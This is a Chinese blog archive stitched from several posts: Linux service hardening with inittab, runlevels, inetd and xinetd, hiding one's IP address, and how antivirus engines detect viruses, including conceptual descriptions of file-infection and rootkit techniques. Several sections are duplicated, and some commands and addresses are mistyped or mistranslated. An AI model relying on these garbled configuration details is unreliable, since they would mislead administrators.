另外一個稱為xinetd的superdaemon比inetd更新穎更復雜,能完成更多的功能。但是對于關閉服務來說,他們的使用方法相似。
使用xinetd時,必須在/etc/xinetd.conf文件中添加一行關閉服務。如果只想簡單的刪除服務,必須刪除好幾行代碼而不是一行。找到想要關閉的服務所在的那一塊,在塊的后面添加“disable = yes”這一行,或者刪除整個塊。例如,如果關閉telnet服務,需要像下面這樣做。(這里的省略號代表了塊的其他內容)
service telnet
{
. . .
disable = yes
}
在某些系統中,對于某些服務,服務配置并不在/etc/xinetd.conf文件中。例如,像telnet這樣的服務有可能在文件/etc/xinetd.d/telnet中,改變其服務配置方法與它在/etc/xinetd.conf文件中的方法是一樣的。
編輯保存了/etc/xinetd.conf文件后或者更改了服務文件后,可以輸入下面的命令讓修改即時生效:
kill -USR2 `pidofxinetd`
這將通知xinetd程序,使用更改后的配置。
Xinetd除了關閉或移除服務配置之外,還可以用于控制遠程主機登錄服務。這將通過幾個機制完成:
可以為服務指定一個允許的主機。例如:可以通過在服務配置文件中添加only_from = 192.168.0.101這一行限制主機登錄telnet服務。盡管使用了詞語“only”,但是它只能限制主機的數目,而不僅僅只一臺主機。也可以使用部分地址指定完整的網絡。例如:可以使用“only_from = 192.168.0.to”表示本地Class C的任何主機都能訪問這個服務。
可以在配置文件中為某個服務指定禁止的主機。例如:可以在配置文件中添加“no_access = 192.168.0.102”這一行禁止這個主機遠程訪問telnet服務。這個也可以使用多次而且也可以使用部分地址指定多個主機。萬一某個主機滿足only_from和no_access兩個限制,則會權衡確定其訪問權限。如果xinetd不能確定哪個限制能被應用,則系統默認更安全的選項——服務不會開啟。
超越服務管理
對于安全的遠程服務訪問,還有更多的事情可以做。應該恰當配置防火墻保護服務免受攻擊。代理服務器、通過網關服務器端口推進以及網絡地址轉移都能有效減少服務攻擊的風險。針對安全使用,那些用于登錄正在運行的服務工具也應進行配置,例如,如果使用安全shell進行遠程連接而沒有使用X Server時,在SSH中調低X forwarding是很重要的。直接進行安全管理是保證Linux系統安全的重要部分,但是它也只是全面安全計劃的一部分。
任何計算機安全措施的一個重要方面是維持實際控制服務的運行,讓不必要的網絡服務接受請求將提高系統的安全風險。即使這些網絡服務對于服務器的某些功能是必要的也需要仔細管理,并且對其進行配置最小化不受歡迎的入侵和登錄的可能性。
為Linux系統配置安全性時,使用/etc/inittab文件、runlevels和一兩個服務管理“superdaemons”如inetd或xinetd直接管理服務。
inittab
/etc/inittab文件用于系統的初始化過程啟動系統服務。在一個配置好的系統上,雖然它一般都不會包括很多服務,但是在某些Linux系統的默認安裝中會加載很多其他服務。/etc/inittab文件內容有些模糊,它的重要之處在于讓服務管理變得相對簡單。
首先,可不要通過/etc/inittab文件方式向系統啟動項中添加服務。
第二,不要移除/etc/inittab文件中第一個冒號之前其第一個字段是單精度型的數字,或整個登錄服務的前面部分。以單精度數字開頭的行可以打開TTY控制臺,所有服務在它們打開之前都一一列出,甚至列出其更重要的功能。也許有些例外情況,在不改動它時是很安全的,尤其如果不確定的情況下請不要改動。
第三,/etc/inittab在導入和runlevel選擇的時候用于過程管理。一般不用于正常的系統操作。
第四,在導入時由rc系統開始添加步驟,而不是init系統。如果看看/etc/inittab的內容,將會注意到登錄以rc0到rc6這樣的字符結束。這是初始化系統如何處理runlevels的說明。
runlevels
基于Linux操作系統的運轉可以通過runlevels進行管理。不同的runlevels被定義成有不同的行為,就像Windows操作系統一樣,它有正常操作模式、安全模式、在某些情況下還有DOS模式。
Runlevel 0用于關閉系統,如果軟電源設置恰當,它能關閉系統電源。
Runlevel 1是單用戶無網絡的模式,它用于低水平的故障修復和管理操作。
Runlevel 2到Runlevel 5正常系統操作的多用戶模式。Runlevel2和3是命令行模式,3有網絡連接而2沒有網絡連接。Runlevel 5用于啟動X Windows提供圖形用戶接口。
Runlevel 6用于系統重啟,當整個init系統甚至bootloader 需要重啟時采用它。
其他runlevels由系統管理員進行定義,但是“傳統”UNIX系統沒有此功能。這種情況下,他們不能被定義也不能被使用。
在shell處,可以輸入runlevel命令找到以前的renlevel和當前runlevel。如果沒有更改系統 runlevel ,命令的輸出結果為大寫N后面跟runlevel的數字,這里的N表示沒有前runlevel,如果要更改runlevel,可以使用init命令,后面跟想要使用到的runlevel的數字。例如,輸入init 6表示重啟系統,或init 1 進入單用戶模式。
配置runlevel的過程每一版本的情況都不同。例如,在Debian GNU/Linux系統中,位于/etc/init.d的服務腳本有來自/etc/rcN.d的路徑與它們進行鏈接,這里的N表示需要配置的runlevel數字。以字母K開頭的symlinks指示在進入runlevel時被殺死的程序,而以字母 S開頭的symlinks指示在進入runlevel時被啟動的程序。字母后面的數字值越大,從1到99,表示啟動或殺死的時間愈靠后。
大多數基于RPM的版本都采用RedHat所用到的rc系統。比起基于Debian的系統,這一系統使用更復雜的路徑結構,并且不同的基于RPM的系統之間也有很大的不同。說明書上提供了更多的關于管理runlevel的信息。
inetd
一個用于Linux后臺程序管理的“superdaemon”是眾所周知的inetd,它是個用于服務管理的命令行工具。終止服務很簡單:首先,作為根用戶用文本編輯器打開/etc/inetd.conf文件。接下來,找到文件中需要終止的服務。最后,在服務所在行的最前面添加#符號(其他還有“尖頂符”和“英鎊符”),如下所示。“注釋掉”這一行,因此inted以后都不會啟動這一服務。
編輯之前服務登錄可能是下面這樣:
ident stream tcp wait identd /usr/sbin/identd identd
停止之后,服務登錄變成下面這個樣子:
# ident stream tcp wait identd /usr/sbin/identd identd
如果正在卸載被登錄參考的后臺程序,可以刪除文件中的某些行——是否通過包管理器進行卸載或刪除執行文件卸載(對于上面的例子是/usr/sbin/identd文件)。
編輯/etc/inetd.conf文件之后,保存它,inetd以后則可以使用更改。編輯和保存一旦完成,可以在根部輸入下面的命令使更改即時生效:
kill -HUP `pidofinetd`
使用修改(保存)后的配置文件會導致inetd重啟。
xinetd
另外一個稱為xinetd的superdaemon比inetd更新穎更復雜,能完成更多的功能。但是對于關閉服務來說,他們的使用方法相似。
使用xinetd時,必須在/etc/xinetd.conf文件中添加一行關閉服務。如果只想簡單的刪除服務,必須刪除好幾行代碼而不是一行。找到想要關閉的服務所在的那一塊,在塊的后面添加“disable = yes”這一行,或者刪除整個塊。例如,如果關閉telnet服務,需要像下面這樣做。(這里的省略號代表了塊的其他內容)
service telnet
{
. . .
disable = yes
}
在某些系統中,對于某些服務,服務配置并不在/etc/xinetd.conf文件中。例如,像telnet這樣的服務有可能在文件/etc/xinetd.d/telnet中,改變其服務配置方法與它在/etc/xinetd.conf文件中的方法是一樣的。
編輯保存了/etc/xinetd.conf文件后或者更改了服務文件后,可以輸入下面的命令讓修改即時生效:
kill -USR2 `pidofxinetd`
這將通知xinetd程序,使用更改后的配置。
Xinetd除了關閉或移除服務配置之外,還可以用于控制遠程主機登錄服務。這將通過幾個機制完成:
可以為服務指定一個允許的主機。例如:可以通過在服務配置文件中添加only_from = 192.168.0.101這一行限制主機登錄telnet服務。盡管使用了詞語“only”,但是它只能限制主機的數目,而不僅僅只一臺主機。也可以使用部分地址指定完整的網絡。例如:可以使用“only_from = 192.168.0.to”表示本地Class C的任何主機都能訪問這個服務。
可以在配置文件中為某個服務指定禁止的主機。例如:可以在配置文件中添加“no_access = 192.168.0.102”這一行禁止這個主機遠程訪問telnet服務。這個也可以使用多次而且也可以使用部分地址指定多個主機。萬一某個主機滿足only_from和no_access兩個限制,則會權衡確定其訪問權限。如果xinetd不能確定哪個限制能被應用,則系統默認更安全的選項——服務不會開啟。
超越服務管理
對于安全的遠程服務訪問,還有更多的事情可以做。應該恰當配置防火墻保護服務免受攻擊。代理服務器、通過網關服務器端口推進以及網絡地址轉移都能有效減少服務攻擊的風險。針對安全使用,那些用于登錄正在運行的服務工具也應進行配置,例如,如果使用安全shell進行遠程連接而沒有使用X Server時,在SSH中調低X forwarding是很重要的。直接進行安全管理是保證Linux系統安全的重要部分,但是它也只是全面安全計劃的一部分。
如何防范自己的IP被攻擊
[ 2007-03-25 02:37:47 | 作者: sun ]
在正式進行各種“黑客行為”之前,黑客會采取各種手段,探測(也可以說“偵察”)對方的主機信息,以便決定使用何種最有效的方法達到自己的目的。來看看黑客是如何獲知最基本的網絡信息——對方的ip地址;以及用戶如何防范自己的ip泄漏。
獲取ip
“ip”作為net用戶的重要標示,是黑客首先需要了解的。獲取的方法較多,黑客也會因不同的網絡情況采取不同的方法,如:在局域網內使用ping指令,ping對方在網絡中的名稱而獲得ip;在internet上使用ip版的qq直接顯示。而最“牛”,也是最有效的辦法是截獲并分析對方的網絡數據包。這是用windows 2003的網絡監視器捕獲的網絡數據包,可能一般的用戶比較難看懂這些16進制的代碼,而對于了解網絡知識的黑客,他們可以找到并直接通過軟件解析截獲后的數據包的ip包頭信息,再根據這些信息了解具體的ip。
隱藏ip
雖然偵察ip的方法多樣,但用戶可以隱藏ip的方法同樣多樣。就拿對付最有效的“數據包分析方法”而言,就可以安裝能夠自動去掉發送數據包包頭ip信息的一些軟件。不過使用這些軟件有些缺點,譬如:它耗費資源嚴重,降低計算機性能;在訪問一些論壇或者網站時會受影響;不適合網吧用戶使用等等。現在的個人用戶采用最普及隱藏ip的方法應該是使用代理,由于使用代理服務器后,“轉址服務”會對發送出去的數據包有所修改,致使“數據包分析”的方法失效。一些容易泄漏用戶ip的網絡軟件(qq、msn、ie等)都支持使用代理方式連接internet,特別是qq使用“ezproxy”等代理軟件連接后,ip版的qq都無法顯示該ip地址。這里筆者介紹一款比較適合個人用戶的簡易代理軟件——網絡新手ip隱藏器,只要在“代理服務器”和“代理服務器端”填入正確的代理服務器地址和端口,即可對http使用代理,比較適合由于ie和qq泄漏ip的情況。
不過使用代理服務器,同樣有一些缺點,如:會影響網絡通訊的速度;需要網絡上的一臺能夠提供代理能力的計算機,如果用戶無法找到這樣的代理服務器就不能使用代理(查找代理服務器時,可以使用“代理獵手”等工具軟件掃描網絡上的代理服務器)。
雖然代理可以有效地隱藏用戶ip,但高深的黑客亦可以繞過代理,查找到對方的真實ip地址,用戶在何種情況下使用何種方法隱藏ip,也要因情況而論。
另外防火墻也可以在某種程度上使用ip的隱藏,如zonealarm防火墻就有一個隱藏在網上的ip的功能。
獲取ip
“ip”作為net用戶的重要標示,是黑客首先需要了解的。獲取的方法較多,黑客也會因不同的網絡情況采取不同的方法,如:在局域網內使用ping指令,ping對方在網絡中的名稱而獲得ip;在internet上使用ip版的qq直接顯示。而最“牛”,也是最有效的辦法是截獲并分析對方的網絡數據包。這是用windows 2003的網絡監視器捕獲的網絡數據包,可能一般的用戶比較難看懂這些16進制的代碼,而對于了解網絡知識的黑客,他們可以找到并直接通過軟件解析截獲后的數據包的ip包頭信息,再根據這些信息了解具體的ip。
隱藏ip
雖然偵察ip的方法多樣,但用戶可以隱藏ip的方法同樣多樣。就拿對付最有效的“數據包分析方法”而言,就可以安裝能夠自動去掉發送數據包包頭ip信息的一些軟件。不過使用這些軟件有些缺點,譬如:它耗費資源嚴重,降低計算機性能;在訪問一些論壇或者網站時會受影響;不適合網吧用戶使用等等。現在的個人用戶采用最普及隱藏ip的方法應該是使用代理,由于使用代理服務器后,“轉址服務”會對發送出去的數據包有所修改,致使“數據包分析”的方法失效。一些容易泄漏用戶ip的網絡軟件(qq、msn、ie等)都支持使用代理方式連接internet,特別是qq使用“ezproxy”等代理軟件連接后,ip版的qq都無法顯示該ip地址。這里筆者介紹一款比較適合個人用戶的簡易代理軟件——網絡新手ip隱藏器,只要在“代理服務器”和“代理服務器端”填入正確的代理服務器地址和端口,即可對http使用代理,比較適合由于ie和qq泄漏ip的情況。
不過使用代理服務器,同樣有一些缺點,如:會影響網絡通訊的速度;需要網絡上的一臺能夠提供代理能力的計算機,如果用戶無法找到這樣的代理服務器就不能使用代理(查找代理服務器時,可以使用“代理獵手”等工具軟件掃描網絡上的代理服務器)。
雖然代理可以有效地隱藏用戶ip,但高深的黑客亦可以繞過代理,查找到對方的真實ip地址,用戶在何種情況下使用何種方法隱藏ip,也要因情況而論。
另外防火墻也可以在某種程度上使用ip的隱藏,如zonealarm防火墻就有一個隱藏在網上的ip的功能。
安全的動力——殺毒軟件引擎技術之窺探
[ 2007-03-25 02:37:30 | 作者: sun ]
一. 群雄逐鹿的殺毒軟件市場
學校機房新購入了一批電腦,負責安裝應用程序的李老師在殺毒軟件的選擇上犯了難,由于機房環境的復雜,如果不安裝殺毒軟件,勢必會因為使用者帶來運行的媒體介質感染了病毒而造成系統癱瘓或交叉感染,無論出現哪種情況都會影響上課進度和效率;但是,如果安裝的殺毒軟件功能不夠強大,無法及時更新數據,一樣不能防止病毒造成破壞。李老師考慮再三,還是決定來到電腦市場購買正版殺毒軟件,但是面對市場上眾多品牌的殺毒軟件,他又犯了難:瑞星、金山、江民、Norton、趨勢、熊貓、卡巴斯基、McAfee……每一款殺毒產品都具備它自己的優缺點和特色,我該選擇哪一種呢?
二. 從病毒原理說開去
病毒的定義和行為特征
在這個年代里,計算機病毒(Computer Virus)已經是家喻戶曉的名詞了,而其在業界里也早已有了定義:計算機病毒是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數據影響計算機使用,并能夠自我復制的一組計算機指令或者程序代碼,它可以是一個程序,一段執行代碼,像生物病毒一樣有獨特的復制能力,可以很快蔓延。他們能把自身附著在各種類型的文件上,隨文件的傳播而蔓延。現在隨著計算機網絡的發展,病毒和網絡技術結合,蔓延的速度更加迅速。計算機病毒具有可執行性、寄生性、傳染性、破壞性、欺騙性、隱蔽性、潛伏性、衍生性。
以上便是早期就已經定義好的計算機病毒概念,而如今可稱為病毒的,還有各種不會感染文件的特洛伊木馬程序(后門)等(Trojan、BackDoor),大部分特洛伊木馬除了不具備對文件的傳染性以外,其他特征均與病毒符合,而且一部分文件型特洛伊木馬還可感染文件。此外,還有一種通過系統漏洞進行傳播的惡意程序或“蠕蟲”(Worm),利用系統自帶的腳本語言功能實現破壞效果的宏病毒和惡意腳本(Macro Virus、Evil Script),因此,文中將把木馬后門、蠕蟲、宏病毒和傳統文件型病毒等統稱為“病毒”。
自我復制
病毒的基本動作是復制自身,文件型病毒會把自身插入正常程序文件內部以便程序每次執行時連病毒代碼也一并執行,惡意程序或木馬后門會將自身復制到系統目錄,然后通過多種途徑令系統在啟動時執行病毒體文件,但是無論是哪種病毒的復制行為,其最終目的都只有一個:潛伏到用戶計算機內,伺機執行各種危害操作。
病毒在執行復制行為時必須隱蔽,否則它會輕易被稍有經驗的用戶發現,因此不同的病毒都會采取各種手段來實現其隱蔽目的,但是無論它們的表現形式如何,最終都可歸納為兩種形式:寄生和欺騙。
寄生
這是文件型病毒的傳播方式,文件型病毒的成品一般沒有自己的獨立程序體,它們通過受感染的可執行文件進行傳播。當用戶執行一個感染了文件型病毒的程序時,由于原程序的執行入口已經被破壞,因此病毒代碼會首先得到執行,將自身載入內存中,成為一個“駐留程序”(TSR),根據病毒作者的破壞性差異,病毒可能僅僅停留在內存空間里等待用戶執行程序時進行感染操作,也可能會主動出擊,搜索用戶計算機上符合感染條件的可執行文件進行感染。
較普通的文件型病毒會將自身代碼放置到受感染文件的頭部或尾部,而后修改文件頭部的執行入口指向自身代碼起始段,以達到自身先于受感染程序執行的目的,當病毒在入內存后,才會去調用受感染文件的真正執行入口,讓受感染文件能夠運行,這樣用戶才不會起疑心。在早期的感染模式里,文件型病毒通常會主動搜索感染可執行文件,甚至因為感染失敗而導致文件損壞的事情也常有發生,而自從微軟在Windows 2000開始引入“系統文件校驗”技術后,主動搜索可執行文件進行感染的病毒寄生技術便因為導致系統不斷出現“系統文件遭遇替換”的警告而逐漸退出舞臺,繼而換成守株待兔類型的等待程序執行后進行感染的被動寄生方式。較新的文件型病毒還會采取不感染系統文件的政策,讓用戶無論如何都難以發現文件被感染的痕跡。
但是直接把自身簡單的插入文件首尾的寄生方式會導致文件體積和修改日期的變化,因此高級的病毒會自動根據目標文件內部的“無用”空間分配情況來將自身代碼分段插入文件體內,并修改文件日期為原始日期,如此一來便加大了檢測和查殺的難度。這一技術得以實現的原因是PE規范的特點:PE文件的每個節之間留有按簇大小對齊后的空洞,病毒體如果足夠小則可以將自身分成幾份并分別插入到每個節最后的空隙中,這樣就不必額外增加一個節,因而文件大小保持不變,能做到這種形式的病毒體積必須十分小巧,否則它會把文件破壞掉的。當文件被執行時,病毒通過初始化代碼的復雜計算將自身全部代碼恢復連貫載入內存,繼續完成下一次感染過程。
欺騙
并非所有病毒(注意此文的“病毒”所指范圍)都是文件型的,例如特洛伊木馬、蠕蟲和惡意程序等,那么它們如何將自身隱蔽呢?這就要用到欺騙了。所謂欺騙,就是利用各種手段將自身執行文件植入系統,而不被用戶輕易察覺,即使被發現,也難以判斷真偽或者無法徹底刪除,從最初的簡單設置文件屬性為隱藏,到現在的偽裝系統核心文件、DLL形式,甚至驅動程序類型的隱藏,病毒技術的不斷發展使得手工查殺增加了難度。
破壞
一個程序是否具備破壞性是衡量它是否屬于病毒的一個重要標準,病毒的破壞是多種多樣的,其實在它們進行寄生或欺騙操作時就已經對被感染的文件、以及受害計算機的環境完整性形成一定的破壞了,由于病毒需要駐留內存進行感染操作,直接導致的影響就是磁盤讀寫增加,計算機響應遲鈍,更有甚者為了取得最高的響應速度,而修改系統正常的優先級設置讓自己達到最高等級,從而導致系統效率嚴重下降。然而這還不是真正可怕的,當病毒發作時,可能會破壞你的文件檔案,或者敞開計算機大門讓入侵者隨意進出,甚至通過特殊的軟件讀寫達到破壞計算機硬件的目的。
三. 剖析殺毒軟件的心臟——引擎技術
病毒和反病毒產品是天生的冤家,由于病毒永無休止的存在,反病毒產品這片領域自然也會出現眾多廠商來分割的局面,因此也就銜生出了多種殺毒引擎技術。
殺毒引擎是決定一款殺毒軟件技術是否成熟可靠的關鍵,什么是殺毒引擎呢?簡言之,它就是一套判斷特定程序行為是否為病毒程序或可疑程序的技術機制,引擎不僅需要具備判斷病毒的能力,還必須擁有足夠的病毒清理技術和環境恢復技術,如果一款殺毒產品能查出病毒但是卻無法清除、或者無法將被病毒破壞的系統環境成功恢復,那它也只能是雞肋。為了達到查殺病毒的目的,殺毒引擎自身要實施的行為就要比病毒還病毒,例如,為了及時獲得環境變動的監控數據,一些殺毒引擎采用DLL的鉤子技術將自身注入系統進程中,這一行為和DLL木馬無異;而為了成功攔截查殺驅動級別木馬Rootkit,殺毒引擎更需要將自身的一部分作為驅動形式運行,以便進入系統內核領域……說到這里,一些計算機配置較低的用戶應該能明白,為什么自己安裝殺毒軟件后計算機速度明顯變慢了,這多半是因為殺毒軟件的“文件監控”等功能導致的,因為這一功能的實現原理就如文件型病毒的寄生過程一樣,只不過文件型病毒是守候在內存中伺機感染每一個打開的文件,而“文件監控”功能是時刻駐守在內存里檢查每一個打開的文件是否存在病毒,兩者導致的后果都是程序載入內存的時間增加,在低配置的計算機表現得比較明顯罷了。
由于以上提到的原因,殺毒軟件是會不可避免的對用戶計算機運行速度造成一定影響的,但是為了安全,大部分用戶只能犧牲一點工作效率來換取安全了,那么,殺毒引擎的具體實現過程又是如何呢?且讓我們來對其窺探一番。
1.守住每一個關卡——程序行為捕獲
每個程序運行時都需要進行各種交互動作,如收發網絡數據、響應某個觸發事件、文件讀寫操作等,這些交互都被稱為“行為”(Action),這個周期過程是可以被跟蹤記錄的,這就是殺毒引擎必須干涉的第一步,當殺毒軟件的環境監視模塊啟動后,它會嵌入系統的操作接口,使得任何非核心程序和除了殺毒軟件自身程序的運作過程都要被它實時監視,這一技術通常通過鉤子技術和驅動層掛載實現,每個殺毒軟件廠商都預先定義了一套病毒行為判斷規范,即在一個給定的范圍和置信度下,判斷相關操作是否為合法。例如一個代碼執行后被發現試圖將自己寫入用戶請求執行的程序文件體內、或進行特定的復制動作和添加注冊表操作,則可將其懷疑為病毒,移交給查毒過程的第二步進一步判斷處理。
為了實現行為捕獲操作,殺毒軟件引擎必須將自身模塊嵌入系統底層,在這個實現方法上,各大廠商都有自己的一套方案,一般廠商普遍采用的是中間件技術,即通過Hook掛鉤方式實現對每個進程的訪問,這種方案通過在系統底層與應用程序之間嵌入一個全局鉤子DLL模塊達到目的,從嚴格上來說,它的相對安全和穩定性較低,但是在源代碼不開放的操作系統層面上,這是最簡單的方法。
一部分廠商因為與操作系統廠商存在合作關系,因而獲得了較其他廠商殺毒產品要高的操作系統特權,所以他們采用的方案是基于系統最底層的系統核心驅動,這種實現方式是最安全的,或者說最高級的實現方式,至今只有Norton獲得了這個特權。隨著病毒技術逐漸滲透到Rootkit層次,過去的Hook技術逐漸有點力不從心,于是殺毒廠商開始轉入驅動方案,當然,由于沒有操作系統廠商的授權,他們并無法實現最底層的核心驅動解決方案,于是殺毒廠商編寫了一個稱為“軟件驅動”的中間件,用于在系統中產生一個虛擬硬件。眾所周知,在操作系統中,只有驅動模塊能通過一個“硬件抽象層(HAL)”的通訊接口而到達系統底層,如今流行的Rootkit木馬也是采用驅動形式進入系統核心的,因此殺毒廠商使用“軟件驅動”來實現底層監視的方案是要比一般的Hook技術效果顯著的,但是這也不可避免會出現一些問題,如果這個“軟件驅動”存在缺陷或者被某些程序異常終止(例如出現未預料的錯誤),在系統底層無任何保護措施的環境下,最直接的一個后果就是系統藍屏崩潰,造成可能的損失。
引用(小知識:系統的幾個“層”)
操作系統作為一個復雜的運作體系,其內部是必須實現一定的功能模塊來進行分工合作的,這些功能模塊像金字塔一樣層層堆積,形成了系統的幾個“層”,分別是系統核心層、硬件抽象層、用戶層。
系統核心層(Kernel Layer)位于整個操作系統的最底層,負責系統的基本運作,在這一層里的所有行為都由系統內置的指令來實現,所有外界因素都不會對這一處的行為造成影響。能直接進入這個層交互的程序不多,除了操作系統自身,第三方廠商若要能在此層直接工作,必須和系統廠商建立合作關系,使用系統廠商提供的接口函數才能進入。目前能在這個層面直接工作的殺毒軟件只有賽門鐵克的Norton AntiVirus。
硬件抽象層(Hardware Abstraction Layer)是美國微軟公司為了便于操作系統在不同硬件結構上進行移植而提出的將系統底層與硬件相關的部分獨立運作的思想,HAL為系統實現了“硬件無關性”,即在不同的硬件平臺上,硬件與操作系統的交互也不會有所差異,這樣一來,硬件廠商開發驅動的難度便能大大降低,HAL將硬件的接口細節隱藏起來,并為操作系統提供一個標準硬件交互接口,目前所有的硬件驅動都工作在這個層面上,當外界硬件存在指令請求時,驅動程序響應請求并將指令通過HAL轉換為系統核心層能理解的指令交給內核執行,如果未找到相應的驅動程序類型,則將其視為“默認硬件”(Default Hardware)處理,什么叫“默認硬件”呢?最簡單的例子就是進入安全模式,這時候大部分驅動程序不會被加載,此時的系統便是工作于“默認硬件”上。大部分使用“軟件驅動”解決方案的殺毒軟件就是在HAL層上虛擬了一個硬件來達到與核心層交互的效果,如McAfee、卡巴斯基等,瑞星2006也是通過這個方案實現了內核交互。
用戶層(User Layer)就是平時我們直接看到的部分,例如桌面,大部分殺毒軟件也是在這一層運行的,主要用于用戶接口交互和將指令傳遞到殺毒引擎。一般運行于Ring3的程序行為也產生于此,一個應用程序產生的指令要求首先被傳遞到HAL層,HAL層將其解釋處理為核心層可以識別的指令串,然后提交給核心層最后進入CPU的指令處理循環,CPU處理完畢后將結果反向送回到用戶層上的應用程序,最終得到運算結果。
2.檢測的核心——基于引擎機制的規則判斷
這一步環節可以稱之為病毒判斷的核心階段,一個好的殺毒引擎能在這個階段識別出相當規模的病毒,其原理是在引擎中內置一部分病毒的特征代碼,稱為“基于特征碼的靜態掃描技術”,即殺毒引擎直接在文件中查找自身攜帶的特征代碼,力求盡量在這一步發現病毒。早期的計算機用戶應該記得,當初的殺毒產品并沒有非常大的病毒特征數據庫,甚至KV300+的所謂病毒特征數據庫還是ASCII格式的,并由用戶自己手工加入,僅僅作為一種簡單的擴充手段來運作而已,這是因為KV300+的主程序內就已經包含了當時各種流行病毒的特征碼。
但是如今由于網絡普及和計算機技術發展,病毒攻勢鋪天蓋地而來,如果單純靠殺毒引擎自身攜帶病毒特征代碼,將會造成主程序體積過于龐大而無法高效率運行,且升級麻煩等難點,因而殺毒引擎不得不將病毒特征庫從自身脫離開來,形成獨立的病毒數據庫結構來與自身保持聯系,這就是“基于特征碼的靜態掃描技術”的擴展產物:病毒特征代碼數據庫。
3.在翰林辭典中穿梭——引擎與病毒特征庫的交互
由于上述原因,如今的殺毒軟件已經不得不采用外部數據庫連接的方法來達到識別病毒的效果,病毒特征代碼數據庫中以特定格式儲存了各種病毒的行為標識和靜態代碼,在工作時,殺毒引擎需要將捕獲到的程序行為轉換為它自身可以識別的行為標識和靜態代碼,然后進入病毒特征代碼數據庫中查詢并期待其返回查詢結果,因此這個步驟是整個殺毒過程中最慢的,但是不可否認,當前的殺毒軟件對大量病毒的識別都是在這個階段完成的。因此一個足夠龐大的病毒庫往往能夠彌補殺毒引擎的不足之處,但是當今病毒越發復雜和繁多,如此長期以往,病毒特征庫將會有一天過于臃腫而導致不良后果,要解決這個問題,只能在核心技術上盡量實現將病毒檢測工作在第二步完成,只可惜在當前我們仍然沒有能夠實現這個想法的殺毒引擎技術,因此如今的殺毒軟件或多或少都依賴著一個幾十MB的病毒特征庫來維持工作,殺毒廠商在殺毒引擎核心未進行關鍵修改時發布的病毒更新其實也就是為了往這個特征數據庫中添加最新發現的病毒數據,以達到查殺新病毒的作用。
“基于特征碼的靜態掃描技術”的最大弱點在于它無法發現和查殺“未公開”或“未收錄”的病毒,由于它的大部分判斷依據來自病毒特征代碼數據庫,一旦用戶被感染了病毒中的“0day”或“私人后門”,殺毒軟件就無能為力,甚至落得個被病毒終結運行的下場,當然,由于殺毒軟件自身的校驗機制,一般不會有病毒愚蠢到去感染殺毒軟件,但是如果一個殺毒軟件被病毒終止了,它就無法對用戶的計算機實施病毒防護了,但是如何判斷阻止由病毒發出的關閉指令,而不影響用戶正常點擊殺毒軟件自身提供的“退出”功能,這也是個難題。
一部分殺毒引擎會通過自身的病毒行為判斷規范來“懷疑”某些未收錄在數據庫中的程序為病毒,并詢問用戶需要什么解決方案,一般情況下,殺毒軟件最折衷的默認解決方案是將被懷疑動機不純的程序文件改名備份到一個被稱為“隔離區”的文件夾中,然后將該原始文件銷毀。這樣做或許能達到查殺未知病毒的目的,但是我們也不能忽視其可能帶來的嚴重后果,例如某個關鍵文件或重要文檔感染了病毒,如果殺毒軟件不由分說就將其消滅,那就很可能引發系統崩潰甚至經濟損失,因為一個健全穩妥的查殺過程和環境恢復是很重要的。
4.月光寶盒——病毒查殺和系統環境恢復
當殺毒引擎檢測到病毒時,需要分為兩種情況對待,首先是尚未來得及進行感染或破壞行為的病毒,在這種情況下殺毒引擎只需要簡單刪除文件就可以了,但是日常操作中用戶面臨最多的還是已經被病毒實施感染破壞行為后的系統環境,在這種情況下,殺毒引擎必須在使用適當的方式查殺病毒后,根據病毒特征庫中記錄的病毒行為來智能判斷當前系統環境遭受破壞的情況并進行恢復,例如對于受病毒感染的文件,殺毒引擎必須根據一定的算法在文件體內找出病毒代碼寄生的部分并給予清除,這個過程必須非常謹慎,否則直接的后果就是導致原文件被破壞,這樣的殺毒就毫無意義了。而對于非文件型的木馬和惡意程序,由于它們會通過各種方式篡改系統注冊表甚至系統文件來達到加載自身之目的,殺毒引擎在清除了這些病毒后能否準確有效的恢復受破壞的系統環境,就是對殺毒引擎的最大挑戰。病毒隱藏技術已經從最初的簡單加載單一啟動項,演化到今天的多重啟動項、進程互相保護、線程監視、遠程注射、可執行文件關聯、服務項目加載、驅動形式加載等方式,甚至采用多項結合的方法,使得查殺工作變得十分困難,甚至只要遺漏了一個文件未能清除,病毒便能卷土重來,因此,如何有效準確的判斷和修復受損環境,也是衡量殺毒引擎技術是否成熟的關鍵。
以上說的是殺毒引擎完整工作過程的原理,那么,它所采取的技術有哪些呢?目前,主流的技術有兩種:虛擬機技術、實時監控技術。除此之外,還有兩種最新的技術仍在試驗階段,分別是智能碼標識技術和行為攔截技術。
1.虛擬機技術
一提起虛擬機,部分讀者可能就會聯想到VMWare去了,然而這里提到的虛擬機并非如此。在反病毒界里,虛擬機也被稱為通用解密器,已經成為反病毒軟件中最重要的部分之一。殺毒引擎的虛擬機技術并非是為病毒提供一套計算機仿真系統,讓其在內部折騰直到暴露出病毒行為特征,在這里的虛擬機是指殺毒引擎模擬出一個仿真CPU,這個“CPU”具備和真正CPU等同的指令分析功能,殺毒引擎將待檢測的程序代碼讀入“CPU”中逐條指令循環執行,直到出現特定情況才結束工作,在這個過程中探知程序是否具備病毒行為特征或者暴露出病毒特征碼。這就是殺毒引擎的“虛擬機技術”,它的目的就是讓程序文件在沒有實際運行的情況下得到運行后的結果,最初虛擬機技術是為了對付變形病毒而產生的,因為變形病毒會將自身代碼以一定的方式進行多次變換,這樣傳統靜態特征碼掃描技術就對其無能為力,因為它根本無法確認特征碼,但是即使再強悍的變形病毒也不可避免在運行時出現一段相對固定的機器碼,否則它自身也無法正常運行完成變形過程,而由于這段機器碼只有在運行時才能被捕獲到,因此工程師開發了“虛擬機技術”誘使病毒在殺毒引擎產生的“CPU”里盡情運行,而后根據其固定機器碼匹配病毒特征數據庫中的靜態特征來判斷這個程序是否病毒。雖然這個技術可能會導致誤報,但是仍不能否認其是一種有效的方法。
2.實時監控技術
實時監控技術,說白了其實就是一個文件監視器,它會在文件打開、關閉、修改等操作時將其攔截并送入查毒模塊進行分析,而在如今的操作系統中要實現對所有文件操作的攔截并非易事,這需要涉及系統核心,因此,這里所采取的方案原型,就是“軟件驅動”。通過驅動進入核心,便能獲知每個文件的操作情況并做出反應了。這項技術的難度在于驅動代碼的編寫,由于內核沒有異常處理過程,在這里執行的代碼稍有一點錯漏都能直接導致系統崩潰,且驅動與用戶層的實時交互也需要一套復雜的實現方案,因此只有一定實力的廠家才實現這項技術,且實現了這項技術的廠家大部分都會連同虛擬機技術、靜態特征碼掃描技術一起結合起來,最終形成自己的產品。
四. 結語
